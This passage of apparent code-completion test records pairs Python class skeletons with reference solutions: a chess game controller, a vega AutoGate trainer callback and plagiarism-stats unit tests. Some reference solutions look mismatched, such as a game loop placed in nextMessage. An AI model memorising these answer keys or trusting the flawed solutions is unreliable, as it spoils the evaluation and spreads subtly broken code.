warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n", "source": "the_stack_v2_python_sparse", "source_path": "hyppopy/solvers/OptunaSolver.py", "source_repo": "MIC-DKFZ/Hyppopy", "split": "test", "star_events_count": 27} {"blob_id": "254fe63d337b4ad07e5bb446e03181efb825ec0c", "bodies": ["self.game = game\nscreen = GameScreen()\nConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})", "while not self.game.over:\n self.runController(RoundController(self.game))\nself.stopRunning()"], "bodies_text": "<|body_start_0|>\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n<|end_body_0|>\n\n<|body_start_1|>\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n<|end_body_1|>\n", "class_docstring": "Controller for running a game of Chess", "class_name": "GameController", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n <|body_0|>\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n<|end_body_0|>\n\n<|body_start_1|>\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000046", "length_bytes": 750, "license_type": "permissive", "methods": [{"docstring": "Initialize the Game Controller", "name": "__init__", "signature": "def __init__(self, game)"}, {"docstring": "Tell the screen to print the next message", "name": "nextMessage", "signature": "def nextMessage(self, event)"}], "n_methods": 2, "prompt": "Implement the Python class `GameController` described below.\n\nClass description:\nController for running a game of Chess\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize the Game Controller\n- def nextMessage(self, event): Tell the screen to print the next message", "prompted_full_text": "Implement the Python class `GameController` described below.\n\nClass description:\nController for running a game of Chess\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize the Game Controller\n- def nextMessage(self, event): Tell the screen to print the next message\n\n<|skeleton|>\nclass GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n <|body_0|>\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n<|end_body_0|>\n\n<|body_start_1|>\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n<|end_body_1|>\n", "revision_id": "2a54293181c1c2b1a2b840ddee4d4d80177efb33", "skeleton": "<|skeleton|>\nclass GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n <|body_0|>\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n", "source": "the_stack_v2_python_sparse", "source_path": "data/train/python/12fdeac9f767a584f3dd82dcead3c9177be1a75fgame_controller.py", "source_repo": "harshp8l/deep-learning-lang-detection", "split": "test", "star_events_count": 0} {"blob_id": "da04639a85eacda4fe96f3646033f00cf0c74b84", "bodies": ["super(CtrTrainerCallback, self).__init__()\nself.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\nself.selected_pairs = list()\nlogging.info('init autogate s2 trainer callback')", "super().before_train(logs)\n'Be called before the training process.'\nhpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\nlogging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\nfeature_interaction_score = hpo_result['feature_interaction_score']\nprint('feature_interaction_score:', feature_interaction_score)\nsorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\nif ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\nelse:\n fis_ratio = 1.0\ntop_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\nself.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\nsetattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)", "curr_auc = float(self.trainer.valid_metrics.results['auc'])\nself.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\nresult_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\nself.sieve_board.to_csv(result_file, sep='\\t')"], "bodies_text": "<|body_start_0|>\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n<|end_body_0|>\n\n<|body_start_1|>\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n<|end_body_1|>\n\n<|body_start_2|>\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n<|end_body_2|>\n", "class_docstring": "AutoGateS2TrainerCallback module.", "class_name": "AutoGateS2TrainerCallback", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0", "BSD-3-Clause", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n <|body_0|>\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n <|body_1|>\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n<|end_body_0|>\n\n<|body_start_1|>\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n<|end_body_1|>\n\n<|body_start_2|>\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000047", "length_bytes": 3088, "license_type": "permissive", "methods": [{"docstring": "Construct AutoGateS2TrainerCallback class.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Call before_train of the managed callbacks.", "name": "before_train", "signature": "def before_train(self, logs=None)"}, {"docstring": "Call after_train of the managed callbacks.", "name": "after_train", "signature": "def after_train(self, logs=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002034", "prompt": "Implement the Python class `AutoGateS2TrainerCallback` described below.\n\nClass description:\nAutoGateS2TrainerCallback module.\n\nMethod signatures and docstrings:\n- def __init__(self): Construct AutoGateS2TrainerCallback class.\n- def before_train(self, logs=None): Call before_train of the managed callbacks.\n- def after_train(self, logs=None): Call after_train of the managed callbacks.", "prompted_full_text": "Implement the Python class `AutoGateS2TrainerCallback` described below.\n\nClass description:\nAutoGateS2TrainerCallback module.\n\nMethod signatures and docstrings:\n- def __init__(self): Construct AutoGateS2TrainerCallback class.\n- def before_train(self, logs=None): Call before_train of the managed callbacks.\n- def after_train(self, logs=None): Call after_train of the managed callbacks.\n\n<|skeleton|>\nclass AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n <|body_0|>\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n <|body_1|>\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n<|end_body_0|>\n\n<|body_start_1|>\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n<|end_body_1|>\n\n<|body_start_2|>\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n<|end_body_2|>\n", "revision_id": "12e37a1991eb6771a2999fe0a46ddda920c47948", "skeleton": "<|skeleton|>\nclass AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n <|body_0|>\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n <|body_1|>\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AutoGateS2TrainerCallback:\n \"\"\"AutoGateS2TrainerCallback module.\"\"\"\n\n def __init__(self):\n \"\"\"Construct AutoGateS2TrainerCallback class.\"\"\"\n super(CtrTrainerCallback, self).__init__()\n self.sieve_board = pd.DataFrame(columns=['selected_feature_pairs', 'score'])\n self.selected_pairs = list()\n logging.info('init autogate s2 trainer callback')\n\n def before_train(self, logs=None):\n \"\"\"Call before_train of the managed callbacks.\"\"\"\n super().before_train(logs)\n 'Be called before the training process.'\n hpo_result = FileOps.load_pickle(FileOps.join_path(self.trainer.local_output_path, 'best_config.pickle'))\n logging.info('loading stage1_hpo_result \\n{}'.format(hpo_result))\n feature_interaction_score = hpo_result['feature_interaction_score']\n print('feature_interaction_score:', feature_interaction_score)\n sorted_pairs = sorted(feature_interaction_score.items(), key=lambda x: abs(x[1]), reverse=True)\n if ModelConfig.model_desc:\n fis_ratio = ModelConfig.model_desc['custom']['fis_ratio']\n else:\n fis_ratio = 1.0\n top_k = int(len(feature_interaction_score) * min(1.0, fis_ratio))\n self.selected_pairs = list(map(lambda x: x[0], sorted_pairs[:top_k]))\n setattr(ModelConfig.model_desc['custom'], 'selected_pairs', self.selected_pairs)\n\n def after_train(self, logs=None):\n \"\"\"Call after_train of the managed callbacks.\"\"\"\n curr_auc = float(self.trainer.valid_metrics.results['auc'])\n self.sieve_board = self.sieve_board.append({'selected_feature_pairs': self.selected_pairs, 'score': curr_auc}, ignore_index=True)\n result_file = FileOps.join_path(self.trainer.local_output_path, '{}_result.csv'.format(self.trainer.__worker_id__))\n self.sieve_board.to_csv(result_file, sep='\\t')\n", "source": "the_stack_v2_python_sparse", "source_path": "vega/algorithms/nas/fis/autogate_s2_trainer_callback.py", "source_repo": "huawei-noah/vega", "split": "test", "star_events_count": 850} {"blob_id": "3f5bd9cc4321e2c3a0dc4fc90cd05ca770aead2b", "bodies": ["first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\nsecond_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\nexpected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\nactual = accumulate_diff_stats(first_text, second_text)\nself.assertEqual(expected, actual)", "expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\ntext_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\ntext_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\nactual = accumulate_diff_stats(text_first, text_second)\nself.assertIn('text_plagiarism', actual)\nself.assertIn('sentence_plagiarism', actual)\nself.assertIn('sentence_lcs_length', actual)\nself.assertIn('difference_indexes', actual)\nself.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\nself.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\nself.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\nself.assertEqual(expected['difference_indexes'], actual['difference_indexes'])", "patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\naccumulate_diff_stats(patches_text, patches_text)\nself.assertTrue(mock.called)", "patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\naccumulate_diff_stats(patches_text, patches_text)\nself.assertTrue(mock.called)", "patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\naccumulate_diff_stats(patches_text, patches_text)\nself.assertTrue(mock.called)"], "bodies_text": "<|body_start_0|>\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n<|end_body_0|>\n\n<|body_start_1|>\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n<|end_body_1|>\n\n<|body_start_2|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_2|>\n\n<|body_start_3|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_3|>\n\n<|body_start_4|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_4|>\n", "class_docstring": "Checks for accumulate_diff_stats function", "class_name": "AccumulateDiffStatsTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n <|body_0|>\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n <|body_1|>\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_2|>\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_3|>\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n<|end_body_0|>\n\n<|body_start_1|>\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n<|end_body_1|>\n\n<|body_start_2|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_2|>\n\n<|body_start_3|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_3|>\n\n<|body_start_4|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000048", "length_bytes": 3701, "license_type": "permissive", "methods": [{"docstring": "Tests that accumulate_diff_stats function can handle simple ideal input", "name": "test_accumulate_diff_stats_ideal", "signature": "def test_accumulate_diff_stats_ideal(self)"}, {"docstring": "Tests that accumulate_diff_stats function can generate correct correct output according to given specs", "name": "test_accumulate_diff_stats_check_output", "signature": "def test_accumulate_diff_stats_check_output(self)"}, {"docstring": "Tests that accumulate_diff_stats function can call required function", "name": "test_accumulate_diff_stats_calls_required_function", "signature": "def test_accumulate_diff_stats_calls_required_function(self, mock)"}, {"docstring": "Tests that accumulate_diff_stats function can call required function", "name": "test_accumulate_diff_stats_calls_second_required_function", "signature": "def test_accumulate_diff_stats_calls_second_required_function(self, mock)"}, {"docstring": "Tests that accumulate_diff_stats function can call required function", "name": "test_accumulate_diff_stats_calls_third_required_function", "signature": "def test_accumulate_diff_stats_calls_third_required_function(self, mock)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_000907", "prompt": "Implement the Python class `AccumulateDiffStatsTest` described below.\n\nClass description:\nChecks for accumulate_diff_stats function\n\nMethod signatures and docstrings:\n- def test_accumulate_diff_stats_ideal(self): Tests that accumulate_diff_stats function can handle simple ideal input\n- def test_accumulate_diff_stats_check_output(self): Tests that accumulate_diff_stats function can generate correct correct output according to given specs\n- def test_accumulate_diff_stats_calls_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_second_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_third_required_function(self, mock): Tests that accumulate_diff_stats function can call required function", "prompted_full_text": "Implement the Python class `AccumulateDiffStatsTest` described below.\n\nClass description:\nChecks for accumulate_diff_stats function\n\nMethod signatures and docstrings:\n- def test_accumulate_diff_stats_ideal(self): Tests that accumulate_diff_stats function can handle simple ideal input\n- def test_accumulate_diff_stats_check_output(self): Tests that accumulate_diff_stats function can generate correct correct output according to given specs\n- def test_accumulate_diff_stats_calls_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_second_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n- def test_accumulate_diff_stats_calls_third_required_function(self, mock): Tests that accumulate_diff_stats function can call required function\n\n<|skeleton|>\nclass AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n <|body_0|>\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n <|body_1|>\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_2|>\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_3|>\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n<|end_body_0|>\n\n<|body_start_1|>\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n<|end_body_1|>\n\n<|body_start_2|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_2|>\n\n<|body_start_3|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_3|>\n\n<|body_start_4|>\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n<|end_body_4|>\n", "revision_id": "ada4bec878dd1cbc19058cb4e87893946ae21498", "skeleton": "<|skeleton|>\nclass AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n <|body_0|>\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n <|body_1|>\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_2|>\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_3|>\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccumulateDiffStatsTest:\n \"\"\"Checks for accumulate_diff_stats function\"\"\"\n\n def test_accumulate_diff_stats_ideal(self):\n \"\"\"Tests that accumulate_diff_stats function can handle simple ideal input\"\"\"\n first_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n second_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n actual = accumulate_diff_stats(first_text, second_text)\n self.assertEqual(expected, actual)\n\n def test_accumulate_diff_stats_check_output(self):\n \"\"\"Tests that accumulate_diff_stats function can generate correct correct output according to given specs\"\"\"\n expected = {'text_plagiarism': 0.875, 'sentence_plagiarism': [1.0, 0.75], 'sentence_lcs_length': [4, 3], 'difference_indexes': [((), ()), ((3, 4), (3, 4))]}\n text_first = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n text_second = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'paw'))\n actual = accumulate_diff_stats(text_first, text_second)\n self.assertIn('text_plagiarism', actual)\n self.assertIn('sentence_plagiarism', actual)\n self.assertIn('sentence_lcs_length', actual)\n self.assertIn('difference_indexes', actual)\n self.assertEqual(expected['text_plagiarism'], actual['text_plagiarism'])\n self.assertEqual(expected['sentence_plagiarism'], actual['sentence_plagiarism'])\n self.assertEqual(expected['sentence_lcs_length'], actual['sentence_lcs_length'])\n self.assertEqual(expected['difference_indexes'], actual['difference_indexes'])\n\n def test_accumulate_diff_stats_calls_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n\n def test_accumulate_diff_stats_calls_second_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n patches_text = (('i', 'have', 'a', 'cat'), ('his', 'name', 'is', 'bruno'))\n accumulate_diff_stats(patches_text, patches_text)\n self.assertTrue(mock.called)\n\n def test_accumulate_diff_stats_calls_third_required_function(self, mock):\n \"\"\"Tests that accumulate_diff_stats function can call required function\"\"\"\n patches_text = (('i', 'have', 'a', 